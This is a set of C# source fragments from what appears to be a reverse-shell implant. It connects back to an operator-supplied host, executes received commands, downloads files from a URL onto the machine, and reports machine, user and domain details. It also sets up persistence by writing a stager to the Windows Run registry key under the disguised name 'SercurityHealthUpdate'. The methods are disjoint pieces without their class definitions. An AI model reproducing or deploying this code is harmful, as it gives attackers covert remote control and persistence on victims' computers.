public bool ValidateArguments(string[] commandArguments)
{
if (commandArguments.Length == 3)
{
// Test whether the first argument is a valid absolute URI
if (Uri.TryCreate(commandArguments[1], UriKind.Absolute, out uri))
{
// Rough test for valid file path
try
{
uploadPath = Path.GetFullPath(commandArguments[2]);
return(true);
}
catch (Exception)
{
connection.SendData($"Upload: Invalid file path argument {commandArguments[2]}\n");
return(false);
}
}
else
{
connection.SendData($"Upload: Invalid URL argument: {commandArguments[1]}\n");
return(false);
}
}
else
{
connection.SendData($"Upload: Error - Invalid number of arguments {commandArguments.ToString()}\n");
return(false);
}
}
public static void Main(string[] args)
{
if (args.Length != 2)
{
throw new ArgumentException();
}
else
{
connection = new TcpReverseConnection();
connection.StartClient(args[0], args[1]);
// Initialize invoker which sets commands in its constructor
CommandInvoker commandInvoker = new CommandInvoker(connection);
connection.SendData($"Connected! Welcome to {Environment.MachineName}\nType 'help' to see available commands\n");
while (connection.IsConnected)
{
connection.SendData(prompt);
// TODO: try/catch for ctrl+c close of connection - maybe attempt reconnect??
string commandReceived = connection.ReceiveData();
try
{
commandInvoker.ParseCommandReceived(commandReceived);
}
catch (Exception e)
{
connection.SendData($"Exception: {e.Message}");
}
}
}
}
public void ParseCommandReceived(string commandFullString)
{
// Remove newline characters from command string
commandFullString = commandFullString.Replace("\n", "");
// Separate any potential parameters and/or flags to commands
string[] commandSplit = commandFullString.Split(' ');
string command = commandSplit[0].ToLower();
//ExecuteCommand() will throw a NullReferenceException when command is not in hashtable
try
{
// Cast the object from the hashtable to an ICommand for execution
ExecuteCommand((ICommand)commands[command], commandSplit);
}
catch (NullReferenceException)
{
connection.SendData($"Invalid Command: {commandFullString}\n");
}
catch (Exception e)
{
if (e.InnerException != null)
{
connection.SendData($"Error: {e.InnerException.Message}\n");
}
else
{
connection.SendData($"Error: {e.Message}\n");
}
}
}
private void ReadStandardOutputThreadMethod()
{
try
{
int character;
// Read() will block until something is available
while ((character = runningProcess.StandardOutput.Read()) > -1)
{
ReadStream(character, runningProcess.StandardOutput, true);
}
}
catch (Exception e)
{
activeConnection.SendData($"ProcessIoManager.ReadStandardOutputThreadMethod() - Exception {e.Message}");
}
}
public void Execute(TcpReverseConnection connection, string[] commandArguments)
{
this.connection = connection;
Dictionary <string, string> helpText = new Dictionary <string, string>();
// Check whether to display generic info about each command, or syntax information and example for a specific command
if (commandArguments.Length == 2)
{
if (commands.ContainsKey(commandArguments[1]))
{
ICommand c = (ICommand)commands[commandArguments[1]];
helpText = c.Help(true);
foreach (string commandName in helpText.Keys)
{
connection.SendData($"{commandName}{new string(' ', (25 - commandName.Length))}{helpText[commandName]}\n");
}
}
else
{
connection.SendData($"Help: Invalid argument - no command '{commandArguments[1]}' exists\n");
}
}
// Just get generic help text for each command
else if (commandArguments.Length == 1)
{
List <Type> completedCommands = new List <Type>();
connection.SendData("\nCore Commands\n=============\n\n");
connection.SendData($"Command{new string(' ', 18)}Description\n-------{new string(' ', 18)}-----------\n");
foreach (string command in commands.Keys)
{
// Check whether helpText has already been displayed for another instance of the command
if (completedCommands.Contains(commands[command].GetType()))
{
continue;
}
else
{
var c = (ICommand)commands[command];
helpText = c.Help(false);
foreach (string commandName in helpText.Keys)
{
connection.SendData($"{commandName}{new string(' ', (25 - commandName.Length))}{helpText[commandName]}\n");
}
completedCommands.Add(commands[command].GetType());
}
}
connection.SendData("\n");
}
else
{
connection.SendData("Help: Error - too many arguments\n");
}
}
public void Execute(TcpReverseConnection connection, string[] commandArguments)
{
this.connection = connection;
if (ValidateArguments(commandArguments))
{
WebClient webClient = new WebClient();
try
{
webClient.DownloadFile(uri.ToString(), uploadPath);
connection.SendData($"Upload: Successfully uploaded file to {uploadPath}\n");
}
catch (WebException e)
{
connection.SendData($"Upload: Error - {e.Message}\n");
}
}
}
/// <summary>
/// Writes stager to HKLM Run key if Admin privileges found. Otherwise writes stager to HKCU run key
/// </summary>
private void RegistryPersistence()
{
// TODO: Accept user input for registry value and file names with option for default random name generation
connection.SendData("[*] Writing stager to file...\n");
string fileName = WriteStagerToFile();
string key;
if (CheckAdminPrivileges())
{
key = @"HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run";
}
else
{
key = @"HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run";
}
Registry.SetValue(key, "SercurityHealthUpdate", fileName);
connection.SendData($"[+] Stager added to Key: {key}\n");
}
public void Execute(TcpReverseConnection connection, string[] commandArguments)
{
this.connection = connection;
//Validate command line arguments before
if (ValidateArguments(commandArguments))
{
connection.HandoffConenection(commandArguments[1], commandArguments[2]);
}
else
{
connection.SendData("Handoff error - incorrect number of arguments supplied\n");
}
}
public void Execute(TcpReverseConnection connection, string[] commandArguments)
{
this.connection = connection;
//This is what will return when the systeminfo command is run is this shell
connection.SendData($"MachineName: {Environment.MachineName}\n");
connection.SendData($"OSVersion: {Environment.OSVersion}\n");
connection.SendData($"dotNETVersion: {Environment.Version}\n");
connection.SendData($"UserName: {Environment.UserName}\n");
connection.SendData($"DomainName: {Environment.UserDomainName}\n");
if (Environment.Is64BitOperatingSystem)
{
connection.SendData($"Architecture: x64\n");
}
else
{
connection.SendData($"Archtecture: x86\n");
}
}
private void OnStdOutRead(string text)
{
connection.SendData(text);
}
